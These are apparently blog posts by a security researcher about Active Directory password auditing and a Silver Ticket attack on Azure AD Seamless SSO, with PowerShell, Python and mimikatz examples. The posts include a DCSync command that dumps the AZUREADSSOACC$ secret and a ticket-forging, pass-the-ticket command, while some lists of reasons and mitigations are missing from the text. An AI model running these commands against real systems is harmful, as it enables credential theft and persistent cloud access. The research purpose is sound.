I will be delivering 2 tech talks at this year’s SecTor conference in Canada:
Unfortunately, it is still unclear whether the conference will need to be moved online.
I will be hosting a webinar titled “PowerShell in the Land of DevOps” on Monday, June 29, 2020, 10:00 AM – 11:30 AM CEST. We will explore features of PowerShell that can be used to automate the deployment of server applications, validate the infrastructure configuration against a well-defined baseline, and orchestrate software tests with GitHub or Azure DevOps.
If you are interested, you can register for this event through GoToWebinar.
Tags: DevOps, GitHub, Microsoft Azure, PowerShell
The Test-PasswordQuality cmdlet now supports cross-domain and cross-forest duplicate password discovery and offline password hash comparison against HaveIBeenPwned:
```powershell
# Replicate all accounts from the local (contoso) domain via the DC we logged on to
$contosoAccounts = Get-ADReplAccount -All -Server $env:LOGONSERVER
# Replicate all accounts from the trusted adatum.com forest with separate admin credentials
$adatumCred = Get-Credential -Message 'Admin credentials for the adatum.com domain:'
$adatumAccounts = Get-ADReplAccount -All -Server 'nyc-dc1.adatum.com' -Credential $adatumCred
# Audit both account sets together: duplicate passwords across domains and offline HIBP hash lookup
$contosoAccounts + $adatumAccounts | Test-PasswordQuality -WeakPasswordHashesSortedFile 'pwned-passwords-ntlm-ordered-by-hash-v5.txt'
```
The output of the previous script might look like this (with some parts omitted):
```
Active Directory Password Quality Report
----------------------------------------
...
Passwords of these accounts have been found in the dictionary:
ADATUM\larry_admin
CONTOSO\harry
...
These groups of accounts have the same passwords:
Group 1:
ADATUM\smith
ADATUM\srv_sql01
Group 2:
ADATUM\Administrator
ADATUM\joe_admin
CONTOSO\Administrator
CONTOSO\joe_admin
...
```
The example above uses the MS-DRSR replication protocol. Similar results can be achieved by using the Get-ADDBAccount cmdlet to read account information directly from an ntds.dit file.
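To show what the two checks above do under the hood, here is an added example (my own code, not part of DSInternals or this post): a byte-offset binary search over a hash-ordered HaveIBeenPwned NTLM file, which is why the cmdlet wants the sorted variant, plus cross-domain duplicate-password grouping over NT hashes. The accounts, hashes (except the two well-known ones) and the small sample file are constructed here.

```python
"""Offline NT-hash audit in the style of Test-PasswordQuality (added example, not DSInternals code)."""
import os
import tempfile
from collections import defaultdict
# Constructed sample input (domain\account, NT hash). Values are made up except the well-known
# NT hashes of an empty password (31D6...) and of the string "password" (8846...).
ACCOUNTS = [
    ("CONTOSO\\harry", "8846F7EAEE8FB117AD06BDD830B7586C"),
    ("ADATUM\\larry_admin", "31D6CFE0D16AE931B73C59D7E0C089C0"),
    ("ADATUM\\smith", "1234567890ABCDEF1234567890ABCDEF"),
    ("ADATUM\\srv_sql01", "1234567890ABCDEF1234567890ABCDEF"),
    ("CONTOSO\\Administrator", "FEDCBA9876543210FEDCBA9876543210"),
    ("ADATUM\\joe_admin", "FEDCBA9876543210FEDCBA9876543210"),
]
# Constructed stand-in for pwned-passwords-ntlm-ordered-by-hash-*.txt: sorted, variable-width lines.
SAMPLE_FILE_LINES = ["00112233445566778899AABBCCDDEEFF:3", "31D6CFE0D16AE931B73C59D7E0C089C0:50000",
                     "8846F7EAEE8FB117AD06BDD830B7586C:1000", "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF:1"]

def write_sample_file():
    path = os.path.join(tempfile.mkdtemp(), "pwned-ntlm-ordered-by-hash-sample.txt")
    with open(path, "w", newline="\n") as f:
        f.write("\n".join(SAMPLE_FILE_LINES) + "\n")
    return path

def lookup_sorted_hash_file(path, nt_hash):
    """Binary search by byte offset, so a multi-GB sorted list is never loaded; returns count or None."""
    needle = nt_hash.upper().encode()
    with open(path, "rb") as f:
        lo, hi = 0, os.path.getsize(path)
        while lo < hi:
            mid = (lo + hi) // 2
            f.seek(max(mid - 1, 0))
            if mid > 0:
                f.readline()            # skip to the first line that starts at or after mid
            start = f.tell()
            line = f.readline()         # empty if no line starts at or after mid
            key, _, count = line.rstrip(b"\r\n").partition(b":")
            if line and key == needle:
                return int(count)
            if line and key < needle:
                lo = start + len(line)  # continue at the next line start
            else:
                hi = mid                # the match, if any, starts before mid
    return None

def duplicate_password_groups(accounts):
    """Accounts with an identical NT hash share a password, regardless of domain or forest."""
    by_hash = defaultdict(list)
    for name, nt_hash in accounts:
        by_hash[nt_hash.upper()].append(name)
    return [sorted(names) for _, names in sorted(by_hash.items()) if len(names) > 1]
```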
One of the lesser known features of Active Directory (AD) is called Credential Roaming. When enabled, it synchronizes DPAPI Master Keys, user certificates (including the corresponding private keys) and even saved passwords between computers. These credentials can easily be extracted from the Active Directory database. If you want to learn more about this topic, be sure to read my #CQLabs article.
Here is the recording of my Black Hat Europe 2019 Briefings session about Exploiting Windows Hello for Business:
Tags: Active Directory, PowerShell, Security, Video
My HipConf 2018 slide deck about Offline Attacks on Active Directory is available for download.
The Restore From Media stuff will be published in the upcoming DSInternals 3.1 release.
Last month, Microsoft introduced a new feature of Azure AD Connect called Single Sign On. It allows companies to configure SSO between AD and AAD without the need to deploy ADFS, which makes it an ideal solution for SMEs. Here is a high-level diagram of this functionality:
As we can see from the diagram above, Azure AD exposes a publicly available endpoint that accepts Kerberos tickets and translates them into SAML and JWT tokens, which are understood and trusted by other cloud services like Office 365, Azure or Salesforce. And wherever you have Kerberos-based authentication, it can be attacked using Silver Tickets.
In usual circumstances this attack can only be performed from the intranet. But what really caught my attention is the fact that with this new SSO feature, Silver Tickets could be used from the entire internet. Let’s give it a try then!
To test this technique, we need to retrieve some information from Active Directory first:
```
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
```
The same information can be retrieved with the DSInternals module:
```powershell
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso `
    -Server lon-dc1.contoso.local
```
Having this information we can now create and use the Silver Ticket on any Windows computer connected to the internet. It does not even matter whether it is joined to a domain or a workgroup:
```
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
```
Afterwards, the injected ticket can be removed from the session:
```
klist purge
```
It is also worth noting that the password of the AZUREADSSOACC account never changes, so the stolen hash/key will work forever. It could therefore be misused by highly privileged employees to retain access to the IT environment after leaving the company. Dealing with such situations is a much broader problem, which is aptly depicted by the following old Narnian saying:
First of all, I have to point out that this technique would not be very practical in real-world situations due to these reasons:
As you can see, there is simply no need to panic. But just to be safe, I would recommend these generic security measures:
Although the Silver Ticket attack has been around for some years, this is probably the first time it can be used over the internet against a cloud service, which theoretically makes it even more potent. On the other hand, it would be quite hard to perform this technique in a real-world environment due to the impracticalities discussed in the previous section, so there is no need to worry. The new Seamless SSO feature of Azure AD Connect can therefore be considered a safe and preferred solution for SSO to Office 365.
Tags: Active Directory, Microsoft Azure, Mimikatz, Office 365, Security
I recently worked with Thycotic to create a program called Weak Password Finder for Active Directory. The goal was to develop a tool that would be very easy to use yet powerful enough to yield actionable results. I think that this combination really makes it unique in the market. It basically does the same as my PowerShell module, but with a nice and shiny user interface:
It generates reports which are suitable for management:
Of course, you can also drill down through the detailed data:
Here is a quick demo of the tool:
Did I mention that the Weak Password Finder is totally FREE?